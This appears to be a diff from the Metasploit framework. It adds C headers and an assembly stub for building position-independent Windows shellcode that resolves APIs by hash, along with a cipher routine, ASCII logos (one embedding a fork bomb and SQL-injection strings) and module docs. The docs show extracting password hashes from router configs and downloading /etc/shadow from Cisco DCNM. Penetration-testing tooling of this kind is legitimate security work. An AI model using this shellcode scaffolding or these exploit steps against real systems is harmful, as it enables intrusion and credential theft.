+    x11 = j11;
+    x12 = j12;
+    x13 = j13;
+    x14 = j14;
+    x15 = j15;
+    for (i = 20;i > 0;i -= 2) {
+      QUARTERROUND( x0, x4, x8,x12)
+      QUARTERROUND( x1, x5, x9,x13)
+      QUARTERROUND( x2, x6,x10,x14)
+      QUARTERROUND( x3, x7,x11,x15)
+      QUARTERROUND( x0, x5,x10,x15)
+      QUARTERROUND( x1, x6,x11,x12)
+      QUARTERROUND( x2, x7, x8,x13)
+      QUARTERROUND( x3, x4, x9,x14)
+    }
+    x0 = PLUS(x0,j0);
+    x1 = PLUS(x1,j1);
+    x2 = PLUS(x2,j2);
+    x3 = PLUS(x3,j3);
+    x4 = PLUS(x4,j4);
+    x5 = PLUS(x5,j5);
+    x6 = PLUS(x6,j6);
+    x7 = PLUS(x7,j7);
+    x8 = PLUS(x8,j8);
+    x9 = PLUS(x9,j9);
+    x10 = PLUS(x10,j10);
+    x11 = PLUS(x11,j11);
+    x12 = PLUS(x12,j12);
+    x13 = PLUS(x13,j13);
+    x14 = PLUS(x14,j14);
+    x15 = PLUS(x15,j15);
+
+#ifndef KEYSTREAM_ONLY
+    x0 = XOR(x0,U8TO32_LITTLE(m + 0));
+    x1 = XOR(x1,U8TO32_LITTLE(m + 4));
+    x2 = XOR(x2,U8TO32_LITTLE(m + 8));
+    x3 = XOR(x3,U8TO32_LITTLE(m + 12));
+    x4 = XOR(x4,U8TO32_LITTLE(m + 16));
+    x5 = XOR(x5,U8TO32_LITTLE(m + 20));
+    x6 = XOR(x6,U8TO32_LITTLE(m + 24));
+    x7 = XOR(x7,U8TO32_LITTLE(m + 28));
+    x8 = XOR(x8,U8TO32_LITTLE(m + 32));
+    x9 = XOR(x9,U8TO32_LITTLE(m + 36));
+    x10 = XOR(x10,U8TO32_LITTLE(m + 40));
+    x11 = XOR(x11,U8TO32_LITTLE(m + 44));
+    x12 = XOR(x12,U8TO32_LITTLE(m + 48));
+    x13 = XOR(x13,U8TO32_LITTLE(m + 52));
+    x14 = XOR(x14,U8TO32_LITTLE(m + 56));
+    x15 = XOR(x15,U8TO32_LITTLE(m + 60));
+#endif
+
+    j12 = PLUSONE(j12);
+    if (!j12) {
+      j13 = PLUSONE(j13);
+      /* stopping at 2^70 bytes per nonce is user's responsibility */
+    }
+
+    U32TO8_LITTLE(c + 0,x0);
+    U32TO8_LITTLE(c + 4,x1);
+    U32TO8_LITTLE(c + 8,x2);
+    U32TO8_LITTLE(c + 12,x3);
+    U32TO8_LITTLE(c + 16,x4);
+    U32TO8_LITTLE(c + 20,x5);
+    U32TO8_LITTLE(c + 24,x6);
+    U32TO8_LITTLE(c + 28,x7);
+    U32TO8_LITTLE(c + 32,x8);
+    U32TO8_LITTLE(c + 36,x9);
+    U32TO8_LITTLE(c + 40,x10);
+    U32TO8_LITTLE(c + 44,x11);
+    U32TO8_LITTLE(c + 48,x12);
+    U32TO8_LITTLE(c + 52,x13);
+    U32TO8_LITTLE(c + 56,x14);
+    U32TO8_LITTLE(c + 60,x15);
+
+    if (bytes <= 64) {
+      if (bytes < 64) {
+        for (i = 0;i < bytes;++i) ctarget[i] = c[i];
+      }
+      x->input[12] = j12;
+      x->input[13] = j13;
+      return;
+    }
+    bytes -= 64;
+    c += 64;
+#ifndef KEYSTREAM_ONLY
+    m += 64;
+#endif
+  }
+}

data/headers/windows/c_payload_util/kernel32_util.h

@@ -0,0 +1,136 @@
+#ifndef _KERNEL_UTIL
+#define _KERNEL_UTIL
+
+typedef BOOL (WINAPI *FuncCreateProcess) (
+	LPCTSTR lpApplicationName,
+	LPTSTR lpCommandLine,
+	LPSECURITY_ATTRIBUTES lpProcessAttributes,
+	LPSECURITY_ATTRIBUTES lpThreadAttributes,
+	BOOL bInheritHandles,
+	DWORD dwCreationFlags,
+	LPVOID lpEnvironment,
+	LPCTSTR lpCurrentDirectory,
+	LPSTARTUPINFO lpStartupInfo,
+	LPPROCESS_INFORMATION lpProcessInformation
+);
+
+typedef BOOL (WINAPI *FuncSetHandleInformation)
+(
+  HANDLE hObject,
+  DWORD dwMask,
+  DWORD dwFlags
+);
+
+typedef BOOL (WINAPI *FuncReadFile)
+(
+  HANDLE hFile,
+  LPVOID lpBuffer,
+  DWORD nNumberOfBytesToRead,
+  LPDWORD lpNumberOfBytesToRead,
+  LPOVERLAPPED lpOverlapped
+);
+
+typedef BOOL (WINAPI *FuncWriteFile)
+(
+  HANDLE hFile,
+  LPCVOID lpBuffer,
+  DWORD nNumberOfBytesToWrite,
+  LPDWORD lpNumberOfBytesWritten,
+  LPOVERLAPPED lpOverlapped
+);
+
+typedef BOOL (WINAPI *FuncPeekNamedPipe)
+(
+  HANDLE hNamedPipe,
+  LPVOID lpBuffer,
+  DWORD nBufferSize,
+  LPDWORD nBytesRead,
+  LPDWORD lpTotalBytesAvailable,
+  LPDWORD lpBytesLeftThisMessage
+);
+
+typedef BOOL (WINAPI *FuncCreatePipe)
+(
+  PHANDLE hReadPipe,
+  PHANDLE hWritePipe,
+  LPSECURITY_ATTRIBUTES lpPipeAttributes,
+  DWORD nSize
+);
+
+typedef BOOL (WINAPI *FuncCloseHandle)
+(
+  HANDLE hObject
+);
+
+typedef HGLOBAL (WINAPI *FuncGlobalAlloc)
+(
+  UINT uFlags,
+  SIZE_T dwBytes
+);
+
+typedef HGLOBAL (WINAPI *FuncGlobalFree)
+(
+  HGLOBAL hMem
+);
+
+typedef HANDLE (WINAPI *FuncHeapCreate)
+(
+  DWORD flOptions,
+  SIZE_T dwInitialize,
+  SIZE_T dwMaximumSize
+);
+
+typedef LPVOID (WINAPI *FuncHeapAlloc)
+(
+  HANDLE hHeap,
+  DWORD dwFlags,
+  SIZE_T dwBytes
+);
+
+typedef VOID (WINAPI *FuncSleep)
+(
+  DWORD dwMilliseconds
+);
+
+typedef HANDLE (WINAPI *FuncGetCurrentProcess) ();
+
+typedef BOOL (WINAPI *FuncGetExitCodeProcess)
+(
+  HANDLE hProcess,
+  LPDWORD lpExitCode
+);
+
+typedef VOID (WINAPI *FuncExitProcess)
+(
+  UINT uExitCode
+);
+
+typedef BOOL (WINAPI *FuncCloseHandle)
+(
+  HANDLE hObject
+);
+
+typedef BOOL (WINAPI *FuncVirtualProtect)
+(
+  LPVOID lpAddress,
+  SIZE_T dwSize,
+  DWORD flNewProtect,
+  PDWORD lpflOldProtect
+);
+
+typedef LPVOID (WINAPI *FuncVirtualAlloc)
+(
+  LPVOID lpAddress,
+  SIZE_T dwSize,
+  DWORD flAllocationType,
+  DWORD flProtect
+);
+
+typedef BOOL (WINAPI *FuncVirtualFree)
+(
+  LPVOID lpAddress,
+  SIZE_T dwSize,
+  DWORD dwFreeType
+);
+
+#endif

data/headers/windows/c_payload_util/payload_util.h

@@ -0,0 +1,152 @@
+/*
+ * This code is provided under the 3-clause BSD license below.
+ * ***********************************************************
+ *
+ * Copyright (c) 2013, Matthew Graeber
+ * All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
+ *
+ *   Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
+ *   Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
+ *   The names of its contributors may not be used to endorse or promote products derived from this software without specific prior written permission.
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+*/
+
+#ifndef _PAYLOAD_UTIL
+#define _PAYLOAD_UTIL
+
+#include <windows.h>
+#include <winternl.h>
+
+typedef HMODULE (WINAPI *FuncLoadLibraryA) (
+	LPTSTR lpFileName
+);
+
+// This compiles to a ROR instruction
+// This is needed because _lrotr() is an external reference
+// Also, there is not a consistent compiler intrinsic to accomplish this across all three platforms.
+#define ROTR32(value, shift)	(((DWORD) value >> (BYTE) shift) | ((DWORD) value << (32 - (BYTE) shift)))
+
+// Redefine PEB structures. The structure definitions in winternl.h are incomplete.
+typedef struct _MY_PEB_LDR_DATA {
+  ULONG Length;
+	BOOL Initialized;
+	PVOID SsHandle;
+	LIST_ENTRY InLoadOrderModuleList;
+  LIST_ENTRY InMemoryOrderModuleList;
+	LIST_ENTRY InInitializationOrderModuleList;
+} MY_PEB_LDR_DATA, *PMY_PEB_LDR_DATA;
+
+typedef struct _MY_LDR_DATA_TABLE_ENTRY
+{
+	LIST_ENTRY InLoadOrderLinks;
+	LIST_ENTRY InMemoryOrderLinks;
+	LIST_ENTRY InInitializationOrderLinks;
+	PVOID DllBase;
+	PVOID EntryPoint;
+	ULONG SizeOfImage;
+	UNICODE_STRING FullDllName;
+	UNICODE_STRING BaseDllName;
+} MY_LDR_DATA_TABLE_ENTRY, *PMY_LDR_DATA_TABLE_ENTRY;
+
+HMODULE GetProcAddressWithHash( _In_ DWORD dwModuleFunctionHash )
+{
+	PPEB PebAddress;
+	PMY_PEB_LDR_DATA pLdr;
+	PMY_LDR_DATA_TABLE_ENTRY pDataTableEntry;
+	PVOID pModuleBase;
+	PIMAGE_NT_HEADERS pNTHeader;
+	DWORD dwExportDirRVA;
+	PIMAGE_EXPORT_DIRECTORY pExportDir;
+	PLIST_ENTRY pNextModule;
+	DWORD dwNumFunctions;
+	USHORT usOrdinalTableIndex;
+	PDWORD pdwFunctionNameBase;
+	PCSTR pFunctionName;
+	UNICODE_STRING BaseDllName;
+	DWORD dwModuleHash;
+	DWORD dwFunctionHash;
+	PCSTR pTempChar;
+	DWORD i;
+
+#if defined(_WIN64)
+	PebAddress = (PPEB) __readgsqword( 0x60 );
+#else
+	PebAddress = (PPEB) __readfsdword( 0x30 );
+#endif
+
+	pLdr = (PMY_PEB_LDR_DATA) PebAddress->Ldr;
+	pNextModule = pLdr->InLoadOrderModuleList.Flink;
+	pDataTableEntry = (PMY_LDR_DATA_TABLE_ENTRY) pNextModule;
+
+	while (pDataTableEntry->DllBase != NULL)
+	{
+		dwModuleHash = 0;
+		pModuleBase = pDataTableEntry->DllBase;
+		BaseDllName = pDataTableEntry->BaseDllName;
+		pNTHeader = (PIMAGE_NT_HEADERS) ((ULONG_PTR) pModuleBase + ((PIMAGE_DOS_HEADER) pModuleBase)->e_lfanew);
+		dwExportDirRVA = pNTHeader->OptionalHeader.DataDirectory[0].VirtualAddress;
+
+		// Get the next loaded module entry
+		pDataTableEntry = (PMY_LDR_DATA_TABLE_ENTRY) pDataTableEntry->InLoadOrderLinks.Flink;
+
+		// If the current module does not export any functions, move on to the next module.
+		if (dwExportDirRVA == 0)
+		{
+			continue;
+		}
+
+		// Calculate the module hash
+		for (i = 0; i < BaseDllName.MaximumLength; i++)
+		{
+			pTempChar = ((PCSTR) BaseDllName.Buffer + i);
+
+			dwModuleHash = ROTR32( dwModuleHash, 13 );
+
+			if ( *pTempChar >= 0x61 )
+			{
+				dwModuleHash += *pTempChar - 0x20;
+			}
+			else
+			{
+				dwModuleHash += *pTempChar;
+			}
+		}
+
+		pExportDir = (PIMAGE_EXPORT_DIRECTORY) ((ULONG_PTR) pModuleBase + dwExportDirRVA);
+
+		dwNumFunctions = pExportDir->NumberOfNames;
+		pdwFunctionNameBase = (PDWORD) ((PCHAR) pModuleBase + pExportDir->AddressOfNames);
+
+		for (i = 0; i < dwNumFunctions; i++)
+		{
+			dwFunctionHash = 0;
+			pFunctionName = (PCSTR) (*pdwFunctionNameBase + (ULONG_PTR) pModuleBase);
+			pdwFunctionNameBase++;
+
+			pTempChar = pFunctionName;
+
+			do
+			{
+				dwFunctionHash = ROTR32( dwFunctionHash, 13 );
+				dwFunctionHash += *pTempChar;
+				pTempChar++;
+			} while (*(pTempChar - 1) != 0);
+
+			dwFunctionHash += dwModuleHash;
+
+			if (dwFunctionHash == dwModuleFunctionHash)
+			{
+				usOrdinalTableIndex = *(PUSHORT)(((ULONG_PTR) pModuleBase + pExportDir->AddressOfNameOrdinals) + (2 * i));
+				return (HMODULE) ((ULONG_PTR) pModuleBase + *(PDWORD)(((ULONG_PTR) pModuleBase + pExportDir->AddressOfFunctions) + (4 * usOrdinalTableIndex)));
+			}
+		}
+	}
+
+	// All modules have been exhausted and the function was not found.
+	return NULL;
+}
+
+#endif

data/headers/windows/c_payload_util/winsock_util.h

@@ -0,0 +1,64 @@
+#ifndef _WINSOCK_UTIL
+#define _WINSOCK_UTIL
+
+#define WIN32_LEAN_AND_MEAN
+
+#include <windows.h>
+#include <winsock2.h>
+#include <intrin.h>
+#include <ws2tcpip.h>
+
+typedef int (WINAPI *FuncWSAStartup)
+(
+  WORD wVersionRequired,
+  LPWSADATA lpWSAData
+);
+
+typedef int (WINAPI *FuncWSACleanup) ();
+
+typedef int (WINAPI *FuncGetAddrInfo)
+(
+  PCSTR pNodeName,
+  PCSTR pServiceName,
+  const ADDRINFO *pHints,
+  LPADDRINFO *ppResult
+);
+
+typedef void (WINAPI *FuncFreeAddrInfo)
+(
+  LPADDRINFO pAddrInfo
+);
+
+typedef SOCKET (WINAPI *FuncWSASocketA) (
+	int af,
+	int type,
+	int protocol,
+	LPWSAPROTOCOL_INFO lpProtocolInfo,
+	GROUP g,
+	DWORD dwFlags
+);
+
+typedef int (WINAPI *FuncConnect)
+(
+  SOCKET s,
+  const struct sockaddr *name,
+  int namelen
+);
+
+typedef int (WINAPI *FuncSend)
+(
+  SOCKET s,
+  const char *buf,
+  int len,
+  int flags
+);
+
+typedef int (WINAPI *FuncRecv)
+(
+  SOCKET s,
+  char *buf,
+  int len,
+  int flags
+);
+
+#endif

data/logos/haKCers.txt

@@ -0,0 +1,33 @@
+                                              `:oDFo:`                            
+                                           ./ymM0dayMmy/.                          
+                                        -+dHJ5aGFyZGVyIQ==+-                    
+                                    `:sm⏣~~Destroy.No.Data~~s:`                
+                                 -+h2~~Maintain.No.Persistence~~h+-              
+                             `:odNo2~~Above.All.Else.Do.No.Harm~~Ndo:`          
+                          ./etc/shadow.0days-Data'%20OR%201=1--.No.0MN8'/.      
+                       -++SecKCoin++e.AMd`       `.-://///+hbove.913.ElsMNh+-    
+                      -~/.ssh/id_rsa.Des-                  `htN01UserWroteMe!-  
+                      :dopeAW.No<nano>o                     :is:TЯiKC.sudo-.A:  
+                      :we're.all.alike'`                     The.PFYroy.No.D7:  
+                      :PLACEDRINKHERE!:                      yxp_cmdshell.Ab0:    
+                      :msf>exploit -j.                       :Ns.BOB&ALICEes7:    
+                      :---srwxrwx:-.`                        `MS146.52.No.Per:    
+                      :<script>.Ac816/                        sENbove3101.404:    
+                      :NT_AUTHORITY.Do                        `T:/shSYSTEM-.N:    
+                      :09.14.2011.raid                       /STFU|wall.No.Pr:    
+                      :hevnsntSurb025N.                      dNVRGOING2GIVUUP:    
+                      :#OUTHOUSE-  -s:                       /corykennedyData:    
+                      :$nmap -oS                              SSo.6178306Ence:    
+                      :Awsm.da:                            /shMTl#beats3o.No.:    
+                      :Ring0:                             `dDestRoyREXKC3ta/M:    
+                      :23d:                               sSETEC.ASTRONOMYist:    
+                       /-                        /yo-    .ence.N:(){ :|: & };:    
+                                                 `:Shall.We.Play.A.Game?tron/    
+                                                 ```-ooy.if1ghtf0r+ehUser5`    
+                                               ..th3.H1V3.U2VjRFNN.jMh+.`          
+                                              `MjM~~WE.ARE.se~~MMjMs              
+                                               +~KANSAS.CITY's~-`                  
+                                                J~HAKCERS~./.`                    
+                                                .esc:wq!:`                        
+                                                 +++ATH`                            
+                                                  `

data/logos/honk.txt

@@ -0,0 +1,22 @@
+%clr                                   ___          ____
+                               ,-""   `.%yel      %whi< HONK >
+                             ,'  _   e %yel)`-._%whi /  ----
+                            /  ,' `-._%yel<.===-'%whi
+                           /  /
+                          /  ;
+              _          /   ;
+ (`._    _.-"" ""--..__,'    |
+ <_  `-""                     \
+  <`-                          :
+   (__   <__.                  ;
+     `-.   '-.__.      _.'    /
+        \      `-.__,-'    _,'
+         `._    ,    /__,-'
+            ""._\__,'%yel< <____%whi
+                 %yel| |  `----.`.
+%whi                 %yel| |        \ `.
+%whi                 %yel; |___      \-``
+%whi                 %yel\   --<
+%whi                  %yel`.`.<
+%whi                    %yel`-'
+%whi

data/utilities/encrypted_payload/AdjustStack.asm

@@ -0,0 +1,48 @@
+/*
+ * This code is provided under the 3-clause BSD license below.
+ * ***********************************************************
+ *
+ * Copyright (c) 2013, Matthew Graeber
+ * All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
+ *
+ *   Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
+ *   Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
+ *   The names of its contributors may not be used to endorse or promote products derived from this software without specific prior written permission.
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+*/
+
+; Author:       Matthew Graeber (@mattifestation)
+; License:      BSD 3-Clause
+; Syntax:       MASM
+; Build Syntax: ml64 /c /Cx AdjustStack.asm
+; Output:       AdjustStack.obj
+; Notes: I really wanted to avoid having this external dependency but I couldnt
+; come up with any other way to guarantee 16-byte stack alignment in 64-bit
+; shellcode written in C.
+
+extern	ExecutePayload
+global  AlignRSP			; Marking AlignRSP as PUBLIC allows for the function
+							; to be called as an extern in our C code.
+
+segment .text
+
+; AlignRSP is a simple call stub that ensures that the stack is 16-byte aligned prior
+; to calling the entry point of the payload. This is necessary because 64-bit functions
+; in Windows assume that they were called with 16-byte stack alignment. When amd64
+; shellcode is executed, you cant be assured that you stack is 16-byte aligned. For example,
+; if your shellcode lands with 8-byte stack alignment, any call to a Win32 function will likely
+; crash upon calling any ASM instruction that utilizes XMM registers (which require 16-byte)
+; alignment.
+
+AlignRSP:
+	push	rsi						; Preserve RSI since were stomping on it
+	mov		rsi, rsp				; Save the value of RSP so it can be restored
+	and		rsp, 0FFFFFFFFFFFFFFF0h	; Align RSP to 16 bytes
+	sub		rsp, 020h				; Allocate homing space for ExecutePayload
+	call	ExecutePayload			; Call the entry point of the payload
+	mov		rsp, rsi				; Restore the original value of RSP
+	pop		rsi						; Restore RSI
+	ret								; Return to caller

data/utilities/encrypted_payload/func_order.ld

@@ -0,0 +1,9 @@
+ENTRY(_ExecutePayload)
+SECTIONS
+{
+	.text :
+	{
+		*(.text.ExecutePayload)
+	}
+
+}

data/utilities/encrypted_payload/func_order64.ld

@@ -0,0 +1,11 @@
+ENTRY(AlignRSP)
+SECTIONS
+{
+	.text :
+	{
+    *(.text.AlignRSP)
+		*(.text.ExecutePayload)
+		*(.text.GetProcAddressWithHash)
+	}
+
+}

documentation/modules/auxiliary/admin/brocade/brocade_config.md

@@ -0,0 +1,50 @@
+## General Notes
+
+This module imports a Brocade configuration file into the database.
+This is similar to `post/brocade/gather/enum_brocade` only access isn't required,
+and assumes you already have the file.
+
+Example files for import can be found on git, like [this](https://raw.githubusercontent.com/h00die/MSF-Testing-Scripts/master/brocade_08.0.30hT311_ic_icx6430.conf).
+
+## Verification Steps
+
+1. Have a Brocade configuration file
+2. Start `msfconsole`
+3. `use auxiliary/admin/brocade/brocade_config`
+4. `set RHOST x.x.x.x`
+5. `set CONFIG /tmp/file.config`
+6. `run`
+
+## Options
+
+  **RHOST**
+
+  Needed for setting services and items to.  This is relatively arbitrary.
+
+  **CONFIG**
+
+  File path to the configuration file.
+
+## Scenarios
+
+```
+msf5 > wget https://raw.githubusercontent.com/h00die/MSF-Testing-Scripts/master/brocade_08.0.30hT311_ic_icx6430.conf -o /dev/null -O /tmp/brocade.conf
+msf5 > use auxiliary/admin/brocade/brocade_config
+msf5 auxiliary(admin/brocade/brocade_config) > set rhosts 127.0.0.1
+rhosts => 127.0.0.1
+msf5 auxiliary(admin/brocade/brocade_config) > set config /tmp/brocade.conf
+config => /tmp/brocade.conf
+msf5 auxiliary(admin/brocade/brocade_config) > run
+[*] Running module against 127.0.0.1
+
+[*] Importing config
+[+] password-display is enabled, hashes will be displayed in config
+[+] enable password hash $1$QP3H93Wm$uxYAs2HmAK0lQiP3ig5tm.
+[+] User brocade of type 8 found with password hash $1$f/uxhovU$dST5lNskZCPQe/5QijULi0.
+[+] ENCRYPTED SNMP community $MlVzZCFAbg== with permissions ro
+[+] ENCRYPTED SNMP community $U2kyXj1k with permissions rw
+[+] Config import successful
+[*] Auxiliary module execution completed
+```
+
+

documentation/modules/auxiliary/admin/cisco/cisco_asa_extrabacon.md

@@ -56,7 +56,7 @@ All of the leaked versions are available in the module
 
 `**` We currently can't distinguish between normal and NPE versions from the SNMP strings. We've commented out the NPE offsets, as NPE is very rare (it is for exporting to places where encryption is crappy), but in the future, we'd like to incorporate these versions. Perhaps as a bool option?
 
-## Verification
+## Verification Steps
 
 - Start `msfconsole`
 - `use auxiliary/admin/cisco/cisco_asa_extrabacon`

documentation/modules/auxiliary/admin/cisco/cisco_config.md

@@ -0,0 +1,51 @@
+## General Notes
+
+This module imports a Cisco configuration file into the database.
+This is similar to `post/cisco/gather/enum_cisco` only access isn't required,
+and assumes you already have the file.
+
+Example files for import can be found on git, like [this](https://raw.githubusercontent.com/GaetanLongree/MASI-ProjetAvanceReseau/3cf1d9a93828d5f44ee1bc4e4c01411e416892c5/Los%20Angeles/LA_EDGE_D.txt)
+or from [Cisco](https://www.cisco.com/en/US/docs/routers/access/800/850/software/configuration/guide/sampconf.html).
+
+## Verification Steps
+
+1. Have a Cisco configuration file
+2. Start `msfconsole`
+3. `use auxiliary/admin/cisco/cisco_config`
+4. `set RHOST x.x.x.x`
+5. `set CONFIG /tmp/file.config`
+6. `run`
+
+## Options
+
+  **RHOST**
+
+  Needed for setting services and items to.  This is relatively arbitrary.
+
+  **CONFIG**
+
+  File path to the configuration file.
+
+## Scenarios
+
+```
+root@metasploit-dev:~/metasploit-framework# wget https://raw.githubusercontent.com/GaetanLongree/MASI-ProjetAvanceReseau/3cf1d9a93828d5f44ee1bc4e4c01411e416892c5/Los%20Angeles/LA_EDGE_D.txt -O /tmp/LA_EDGE_D.txt -o /dev/null
+
+root@metasploit-dev:~/metasploit-framework# ./msfconsole 
+
+[*] Starting persistent handler(s)...
+msf5 > use auxiliary/admin/cisco/cisco_config 
+msf5 auxiliary(admin/cisco/cisco_config) > set config /tmp/LA_EDGE_D.txt
+config => /tmp/LA_EDGE_D.txt
+msf5 auxiliary(admin/cisco/cisco_config) > set rhost 127.0.0.1
+rhost => 127.0.0.1
+msf5 auxiliary(admin/cisco/cisco_config) > run
+[*] Running module against 127.0.0.1
+
+[*] Importing config
+[+] 127.0.0.1:22 MD5 Encrypted Enable Password: $1$mERr$DWwx4W/5HXD2oail62IeB1
+[+] 127.0.0.1:22 Username 'Waldo' with MD5 Encrypted Password: $1$mERr$DWwx4W/5HXD2oail62IeB1
+[+] Config import successful
+[*] Auxiliary module execution completed
+```
+

documentation/modules/auxiliary/admin/cisco/cisco_dcnm_download.md

@@ -1,4 +1,4 @@
-## Intro
+## Vulnerable Application
 
 Cisco Data Center Network Manager exposes a servlet to download files on /fm/downloadServlet.
 An authenticated user can abuse this servlet to download arbitrary files as root by specifying
@@ -8,21 +8,7 @@ This module was tested on the DCNM Linux virtual appliance 10.4(2), 11.0(1) and
 work on a few versions below 10.4(2). Only version 11.0(1) requires authentication to exploit
 (see References to understand why), on the other versions it abuses CVE-2019-1619 to bypass authentication.
 
-
-## Author and discoverer
-
-Pedro Ribeiro (pedrib@gmail.com) from Agile Information Security
-
-
-## References
-
-https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190626-dcnm-bypass
-https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190626-dcnm-file-dwnld
-https://raw.githubusercontent.com/pedrib/PoC/master/exploits/metasploit/cisco_dcnm_download.rb
-https://seclists.org/fulldisclosure/2019/Jul/7
-
-
-## Usage
+## Scenarios
 
 Setup RHOST, pick the file to download (FILENAME, default is /etc/shadow) and enjoy!
 

documentation/modules/auxiliary/admin/http/cnpilot_r_cmd_exec.md

@@ -8,7 +8,7 @@ Cambium cnPilot r200/r201 device software versions 4.2.3-R4 and newer, contain a
 4. Do: ```set CMD [command]```
 5. Do: ```run```
 
-## Sample Output
+## Scenarios
 
   ```
 msf > use auxiliary/scanner/http/cnpilot_r_cmd_exec

documentation/modules/auxiliary/admin/http/cnpilot_r_fpt.md

@@ -1,3 +1,5 @@
+## Vulnerable Application
+
 This module exploits a File Path Traversal vulnerability in Cambium cnPilot r200/r201 devices to read arbitrary files off the file system. Affected versions - 4.3.3-R4 and prior.
 
 ## Verification Steps
@@ -8,7 +10,7 @@ This module exploits a File Path Traversal vulnerability in Cambium cnPilot r200
 4. Do: ```set FILENAME [filename]```
 5. Do: ```run```
 
-## Sample Output
+## Scenarios
 
   ```
 msf > use auxiliary/scanner/http/cnpilot_r_fpt

documentation/modules/auxiliary/admin/http/epmp1000_get_chart_cmd_exec.md

@@ -8,7 +8,7 @@ This module exploits an OS Command Injection vulnerability in Cambium ePMP 1000
 4. Do: ```set CMD [COMMAND]```
 5. Do: ```run```
 
-## Sample Output
+## Scenarios
 
   ```
 msf > use auxiliary/scanner/http/epmp1000_get_chart_cmd_exec

documentation/modules/auxiliary/admin/http/epmp1000_reset_pass.md

@@ -9,7 +9,7 @@ This module exploits an access control vulnerability in Cambium ePMP device mana
 5. Do: ```set NEW_PASSWORD newpass```
 6. Do: ```run```
 
-## Sample Output
+## Scenarios
 
   ```
 msf > use use auxiliary/scanner/http/epmp1000_reset_pass

documentation/modules/auxiliary/admin/http/supra_smart_cloud_tv_rfi.md

@@ -15,7 +15,7 @@ attacker on the local network can send a crafted request to broadcast a fake vid
 
 Doo-doodoodoodoodoo-doo, Epic Sax Guy will be broadcasted to the remote system.
 
-## Sample Output
+## Scenarios
 
 ```
 msf5 > use auxiliary/admin/http/supra_smart_cloud_tv_rfi 

documentation/modules/auxiliary/admin/juniper/juniper_config.md

@@ -0,0 +1,91 @@
+## General Notes
+
+This module imports a Juniper configuration file into the database.
+This is similar to `post/juniper/gather/enum_juniper` only access isn't required,
+and assumes you already have the file.
+
+Example files for import can be found on git, like [this (junos)](https://raw.githubusercontent.com/h00die/MSF-Testing-Scripts/master/juniper_ex2200.config)
+or [this (screenos)](https://raw.githubusercontent.com/h00die/MSF-Testing-Scripts/master/juniper_ssg5_screenos.conf).
+
+## Verification Steps
+
+1. Have a Juniper configuration file
+2. Start `msfconsole`
+3. `use auxiliary/admin/juniper/juniper_config`
+4. `set RHOST x.x.x.x`
+5. `set CONFIG /tmp/file.config`
+6. `set action junos`
+7. `run`
+
+## Options
+
+  **RHOST**
+
+  Needed for setting services and items to.  This is relatively arbitrary.
+
+  **CONFIG**
+
+  File path to the configuration file.
+
+  **Action**
+
+  `JUNOS` for JunOS config file, and `SCREENOS` for ScreenOS config file.
+
+## Scenarios
+
+### JunOS
+
+```
+root@metasploit-dev:~/metasploit-framework# wget -o /dev/null -O /tmp/juniper_ex2200.config https://raw.githubusercontent.com/h00die/MSF-Testing-Scripts/master/juniper_ex2200.config
+root@metasploit-dev:~/metasploit-framework# ./msfconsole 
+
+[*] Starting persistent handler(s)...
+msf5 > use auxiliary/admin/juniper/gather/juniper_config
+msf5 auxiliary(admin/juniper/gather/juniper_config) > set config /tmp/juniper_ex2200.config
+config => /tmp/juniper_ex2200.config
+msf5 auxiliary(admin/juniper/gather/juniper_config) > set rhost 127.0.0.1
+rhost => 127.0.0.1
+msf5 auxiliary(admin/juniper/gather/juniper_config) > run
+[*] Running module against 127.0.0.1
+
+[*] Importing config
+[+] root password hash: $1$pz9b1.fq$foo5r85Ql8mXdoRUe0C1E.
+[+] User 2000 named newuser in group super-user found with password hash $1$rm8FaMFY$k4LFxqsVAiGO5tKqyO9jJ/.
+[+] User 2002 named newuser2 in group operator found with password hash $1$aDZi44AP$bQGGjqPJ.F.Cm5QvX2yaa0.
